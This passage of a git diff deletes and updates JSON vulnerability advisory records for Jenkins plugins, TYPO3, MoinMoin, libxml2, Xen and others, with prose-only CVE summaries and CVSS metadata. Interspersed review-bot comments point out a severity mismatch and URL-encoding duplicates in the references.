- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000190"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-865"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-06-05T20:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json b/advisories/unreviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json
deleted file mode 100644
index 7b3fb5e77b9d5..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-278v-j3cr-jv2x/GHSA-278v-j3cr-jv2x.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-278v-j3cr-jv2x",
- "modified": "2022-05-13T01:31:34Z",
- "published": "2022-05-13T01:31:34Z",
- "aliases": [
- "CVE-2019-1003020"
- ],
- "details": "A server-side request forgery vulnerability exists in Jenkins Kanboard Plugin 1.5.10 and earlier in KanboardGlobalConfiguration.java that allows attackers with Overall/Read permission to submit a GET request to an attacker-specified URL.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003020"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-818"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-918"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-02-06T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json b/advisories/unreviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json
deleted file mode 100644
index 50f832f0d1623..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-2cm5-f78c-h2c8/GHSA-2cm5-f78c-h2c8.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-2cm5-f78c-h2c8",
- "modified": "2022-05-13T01:36:51Z",
- "published": "2022-05-13T01:36:51Z",
- "aliases": [
- "CVE-2017-2652"
- ],
- "details": "It was found that there were no permission checks performed in the Distributed Fork plugin before and including 1.5.0 for Jenkins that provides the dist-fork CLI command beyond the basic check for Overall/Read permission, allowing anyone with that permission to run arbitrary shell commands on all connected nodes.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2652"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-03-20/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/96980"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-287"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-07-27T20:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json b/advisories/unreviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json
deleted file mode 100644
index 7838a03399712..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-2j76-26qq-7rvv/GHSA-2j76-26qq-7rvv.json
+++ /dev/null
@@ -1,83 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-2j76-26qq-7rvv",
- "modified": "2022-05-17T05:49:23Z",
- "published": "2022-05-17T05:49:23Z",
- "aliases": [
- "CVE-2010-2969"
- ],
- "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, and 1.9.x before 1.9.3, allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/LikePages.py, (2) action/chart.py, and (3) action/userprofile.py, a similar issue to CVE-2010-2487.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2969"
- },
- {
- "type": "WEB",
- "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809"
- },
- {
- "type": "WEB",
- "url": "http://hg.moinmo.in/moin/1.7/rev/37306fba2189"
- },
- {
- "type": "WEB",
- "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES"
- },
- {
- "type": "WEB",
- "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2"
- },
- {
- "type": "WEB",
- "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg"
- },
- {
- "type": "WEB",
- "url": "http://moinmo.in/MoinMoinRelease1.9"
- },
- {
- "type": "WEB",
- "url": "http://moinmo.in/SecurityFixes"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/40836"
- },
- {
- "type": "WEB",
- "url": "http://www.debian.org/security/2010/dsa-2083"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/40549"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/1981"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-08-05T13:22:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json b/advisories/unreviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json
deleted file mode 100644
index 24ace53835e71..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-2q2r-xgj5-h3hm/GHSA-2q2r-xgj5-h3hm.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-2q2r-xgj5-h3hm",
- "modified": "2022-05-02T03:48:54Z",
- "published": "2022-05-02T03:48:54Z",
- "aliases": [
- "CVE-2009-3821"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3821"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-014/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-10-28T10:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json b/advisories/unreviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json
deleted file mode 100644
index 2bc8b471e195a..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-2r46-cwgm-vvjx/GHSA-2r46-cwgm-vvjx.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-2r46-cwgm-vvjx",
- "modified": "2022-05-13T01:15:04Z",
- "published": "2022-05-13T01:15:04Z",
- "aliases": [
- "CVE-2019-10279"
- ],
- "details": "A missing permission check in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10279"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json b/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json
index 701e9d5e090e2..69e061c33c981 100644
--- a/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json
+++ b/advisories/unreviewed/2022/05/GHSA-2v24-xp2p-2gfc/GHSA-2v24-xp2p-2gfc.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2v24-xp2p-2gfc",
- "modified": "2022-05-01T01:50:36Z",
+ "modified": "2024-02-02T03:30:30Z",
 "published": "2022-05-01T01:50:36Z",
 "aliases": [
 "CVE-2005-0587"
 ],
 "details": "Firefox before 1.0.1 and Mozilla before 1.7.6 allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
 
@@ -41,7 +44,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-59"
 ],
 "severity": "LOW",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json b/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json
index 2cf5c05604ccb..6daa15252e1db 100644
--- a/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json
+++ b/advisories/unreviewed/2022/05/GHSA-2vw2-h5mp-gfhw/GHSA-2vw2-h5mp-gfhw.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2vw2-h5mp-gfhw",
- "modified": "2022-05-02T03:35:01Z",
+ "modified": "2024-02-02T18:30:21Z",
 "published": "2022-05-02T03:35:01Z",
 "aliases": [
 "CVE-2009-2416"
 ],
 "details": "Multiple use-after-free vulnerabilities in libxml2 2.5.10, 2.6.16, 2.6.26, 2.6.27, and 2.6.32, and libxml 1.8.17, allow context-dependent attackers to cause a denial of service (application crash) via crafted (1) Notation or (2) Enumeration attribute types in an XML file, as demonstrated by the Codenomicon XML fuzzing framework.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -177,7 +180,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
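Review bot: The CVSS 3.1 vector added to GHSA-2v24-xp2p-2gfc (`"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"`) works out to a 6.5 (Medium) base score under the CVSS 3.1 formula, yet the second hunk of the same file leaves `"severity": "LOW"` as it was. If `database_specific.severity` is meant to mirror the CVSS bucket, that line should become `"severity": "MODERATE"`; if it is intentionally carried over from an older rating, the mismatch should at least be confirmed as deliberate rather than a partial update. The GHSA-2vw2-h5mp-gfhw hunks on the same line are consistent on this point (an availability-only vector alongside MODERATE).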
diff --git a/advisories/unreviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json b/advisories/unreviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json
deleted file mode 100644
index 7b42fb23ca3cb..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-2wgg-c8xc-7gg3/GHSA-2wgg-c8xc-7gg3.json
+++ /dev/null
@@ -1,55 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-2wgg-c8xc-7gg3",
- "modified": "2022-05-02T03:46:56Z",
- "published": "2022-05-02T03:46:56Z",
- "aliases": [
- "CVE-2009-3628"
- ],
- "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to determine an encryption key via crafted input to a tt_content form element.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3628"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53917"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/37122"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/36801"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2009/3009"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-11-02T15:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json b/advisories/unreviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json
deleted file mode 100644
index 8bbfc81715c23..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-33jj-92px-m4g7/GHSA-33jj-92px-m4g7.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-33jj-92px-m4g7",
- "modified": "2022-05-24T17:45:29Z",
- "published": "2022-05-24T17:45:29Z",
- "aliases": [
- "CVE-2020-19626"
- ],
- "details": "Cross Site Scripting (XSS) vulnerability in craftcms 3.1.31, allows remote attackers to inject arbitrary web script or HTML, via /admin/settings/sites/new.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19626"
- },
- {
- "type": "WEB",
- "url": "https://github.com/craftcms/cms/commit/76a2168b6a5e30144f5c06da4ff264f4eca577ff"
- },
- {
- "type": "WEB",
- "url": "http://mayoterry.com/file/cve/XSS_vuluerability_in_Craftcms_3.1.31.pdf"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2021-03-26T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json b/advisories/unreviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json
deleted file mode 100644
index de677a2a595d6..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3858-58w9-wpcg/GHSA-3858-58w9-wpcg.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3858-58w9-wpcg",
- "modified": "2022-05-13T01:31:34Z",
- "published": "2022-05-13T01:31:34Z",
- "aliases": [
- "CVE-2019-1003021"
- ],
- "details": "An exposure of sensitive information vulnerability exists in Jenkins OpenId Connect Authentication Plugin 1.4 and earlier in OicSecurityRealm/config.jelly that allows attackers able to view a Jenkins administrator's web browser output, or control the browser (e.g. malicious extension) to retrieve the configured client secret.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003021"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-886"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-02-06T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json b/advisories/unreviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json
deleted file mode 100644
index 20ca42e366f73..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3892-qqv6-h2qm/GHSA-3892-qqv6-h2qm.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3892-qqv6-h2qm",
- "modified": "2022-05-14T03:18:39Z",
- "published": "2022-05-14T03:18:39Z",
- "aliases": [
- "CVE-2018-1000177"
- ],
- "details": "A cross-site scripting vulnerability exists in Jenkins S3 Plugin 0.10.12 and older in src/main/resources/hudson/plugins/s3/S3ArtifactsProjectAction/jobMain.jelly that allows attackers able to control file names of uploaded files to define file names containing JavaScript that would be executed in another user's browser when that user performs some UI actions.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000177"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-04-16/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-05-08T15:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json b/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json
index 9f7349d15570a..6b5eaa33031d9 100644
--- a/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json
+++ b/advisories/unreviewed/2022/05/GHSA-397g-22v6-9m75/GHSA-397g-22v6-9m75.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-397g-22v6-9m75",
- "modified": "2022-05-24T19:21:18Z",
+ "modified": "2024-02-04T09:30:31Z",
 "published": "2022-05-24T19:21:18Z",
 "aliases": [
 "CVE-2021-28705"
 ],
 "details": "issues with partially successful P2M updates on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). In some cases the hypervisor carries out the requests by splitting them into smaller chunks. Error handling in certain PoD cases has been insufficient in that in particular partial success of some operations was not properly accounted for. There are two code paths affected - page removal (CVE-2021-28705) and insertion of new pages (CVE-2021-28709). (We provide one patch which combines the fix to both issues.)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -18,6 +21,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28705"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/"
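Review bot: The two references added to GHSA-397g-22v6-9m75 in the second hunk duplicate Fedora announcement URLs the file already carries (one visible right after them, the other in the following hunk), differing only in `%40` versus `@` in the list address, so each of the two list messages is now listed twice. Normalising the incoming URL to the form already present (the `@` spelling) before appending, or de-duplicating on the decoded URL, would keep the references array free of such encoding-only duplicates; the same import path may have produced the same pair elsewhere. The references array continues past the end of this hunk.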
@@ -26,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-07"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2021/dsa-5017"
diff --git a/advisories/unreviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json b/advisories/unreviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json
deleted file mode 100644
index f112ce9f60ea3..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-39vm-rvwh-q86j/GHSA-39vm-rvwh-q86j.json
+++ /dev/null
@@ -1,47 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-39vm-rvwh-q86j",
- "modified": "2022-05-14T02:42:14Z",
- "published": "2022-05-14T02:42:14Z",
- "aliases": [
- "CVE-2010-4616"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in modules/content/admin/content.php in ImpressCMS 1.2.3 Final, and possibly other versions before 1.2.4, allows remote attackers to inject arbitrary web script or HTML via the quicksearch_ContentContent parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4616"
- },
- {
- "type": "WEB",
- "url": "http://community.impresscms.org/modules/smartsection/item.php?itemid=525"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/42695"
- },
- {
- "type": "WEB",
- "url": "http://www.htbridge.ch/advisory/xss_vulnerability_in_impresscms.html"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/archive/1/515397/100/0/threaded"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-12-29T22:33:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json b/advisories/unreviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json
deleted file mode 100644
index 7a3e4b2e2d5c9..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3ccq-gccx-pm7j/GHSA-3ccq-gccx-pm7j.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3ccq-gccx-pm7j",
- "modified": "2022-05-13T01:18:46Z",
- "published": "2022-05-13T01:18:46Z",
- "aliases": [
- "CVE-2018-1000425"
- ],
- "details": "An insufficiently protected credentials vulnerability exists in Jenkins SonarQube Scanner Plugin 2.8 and earlier in SonarInstallation.java that allows attackers with local file system access to obtain the credentials used to connect to SonarQube.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000425"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1163"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/106532"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-522"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-01-09T23:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json b/advisories/unreviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json
deleted file mode 100644
index f58db32fa4df7..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3cqw-pxgr-jhrm/GHSA-3cqw-pxgr-jhrm.json
+++ /dev/null
@@ -1,55 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3cqw-pxgr-jhrm",
- "modified": "2022-05-02T03:46:56Z",
- "published": "2022-05-02T03:46:56Z",
- "aliases": [
- "CVE-2009-3631"
- ],
- "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2, when the DAM extension or ftp upload is enabled, allows remote authenticated users to execute arbitrary commands via shell metacharacters in a filename.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3631"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53923"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/37122"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/36801"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2009/3009"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-94"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-11-02T15:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json b/advisories/unreviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json
deleted file mode 100644
index f76da018e4afe..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3fpx-g9h3-hh8x/GHSA-3fpx-g9h3-hh8x.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3fpx-g9h3-hh8x",
- "modified": "2023-02-11T21:30:24Z",
- "published": "2022-05-24T22:00:44Z",
- "aliases": [
- "CVE-2019-10430"
- ],
- "details": "Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10430"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1504"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-312"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-09-25T16:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json b/advisories/unreviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json
deleted file mode 100644
index e8c1f8a361c06..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3gm8-32vv-q8mp/GHSA-3gm8-32vv-q8mp.json
+++ /dev/null
@@ -1,95 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3gm8-32vv-q8mp",
- "modified": "2022-05-13T01:13:04Z",
- "published": "2022-05-13T01:13:04Z",
- "aliases": [
- "CVE-2010-2230"
- ],
